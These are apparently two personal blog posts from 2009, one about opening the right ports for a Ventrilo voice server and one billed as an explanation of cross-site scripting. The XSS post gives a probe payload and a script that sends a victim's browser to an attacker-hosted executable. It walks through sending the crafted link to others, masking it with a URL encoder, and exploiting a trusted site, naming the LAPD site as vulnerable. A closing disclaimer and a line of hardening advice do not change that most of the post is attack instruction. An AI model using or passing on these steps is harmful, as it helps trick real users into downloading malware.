Friday, February 13, 2009

Woot vent's up

Finally got ventrilo working... it took forever because I didn't realize it used UDP & only opened the port for TCP. In my defense, 'udp' appeared exactly ZERO times in the the configuration info I read. ><. I checked. 

Getting it set up though gave me a great idea: what how about music over vent?

Tuesday, February 10, 2009

XSS Vulnerabilities

Thousands of new websites are popping up every day on the world wide web. It is a great way for people all across the world to display information, to talk with friends, all kinds of great things. We aren't even using the internet to its full potential yet! Theres just one problem: the internet is vulnerable, and that makes computers who go ON the internet vulnerable.

Take cross side scripting (XSS) vulnerabilities. Note that cross side scripting is 'XSS', not 'CSS'. CSS stands for Cascading Style Sheets and is used along with html to organize and structure web pages. For all new web designers, it is important to protect yourself against xss attacks, which are quite common and unbelievably simple to perform.

What is an xss attack?
XSS is a form of client-side attack. Basically it means that an attacker can inject code into a website from his own computer, even without administrative or FTP privelages. Lets use a common feature on websites for an example. A search box. A user inputs a query into the box and hits search. After a few moments, a new page displays with lists of links to different pages that relate to your search. But what happens to the actual HTML? Next time you search, take a look at the source code that is returned to your browser after a search. Your search term (in an xss vulnerable site) was put directly into the html. This happens when the search page displays something along the lines of "Your search for: 'yoursearchtermhere'" at the top of the page. XSS is using that search term in the html code to inject your own code.

How do I know if a page is xss vulnerable?
This is simple. go to any sort of input box. This can be a login, password, email, search box, anything that allows you to type and submit. In the box, type "alert('XSS vulnerable')" (make sure to omit the quotation marks and add tags). When you hit enter, if a pop up box displaying "XSS vulnerable" appears, then the page is vulnerable to javascript xss exploits.

How can an XSS vulnerability on my site be used?
There are lots of ways that XSS can be used. One of the more dangerous ways to use it is to inject code to steal users cookies, which can then be used to trick the websites server into granting you access to that users account and information. It can also be used to download local files from another persons computer.

Ok... but HOW?
Simple. If you have found a site vulnerable to cross site scripting, inputting this code will allow you to download a file to someones computer (you must add < and > around the 'script' and '/script' tags):

script document.location="Your site's .exe file";/script

Put that into the search box and you should be prompted to download your executable. Wonderful. Now what? Now, you copy and paste the full url from the address bar and you can give it to anyone via forum, IM, email, whatever floats your boat. If someone opens it and downloads the executable, they will download whatever your exe file contained.

No one would be stupid enough to fall for that... would they?
Depends. First of all, this can be done to a trustworthy site. The LAPD site happens to be vulnerable to XSS. Adding your script to the end of the LAPD's site may very well fool most people. But if you really want to hide it from people, then you can use a URL masker/encoder to hide the part of the url that shows your script request. That will fool most people.

So there you have it. Play around with XSS for a little bit and you will quickly see the dangers that it can pose to an unprotected site. So make sure, if you are building a site, to properly clean up your code so that users cannot input their own scripts to hijack your site and/or your clients computers and information.



**I DO NOT CONDONE THE USE OF XSS OR ANY OTHER FORM OF 'HACKING' OR SCRIPTING AGAINST A SITE. USE ANYTHING IN THIS POST AT YOUR OWN RISK, AND REMEMBER USE OF IT WITHOUT PERMISSION OF A SITES OWNER IS ILLEGAL**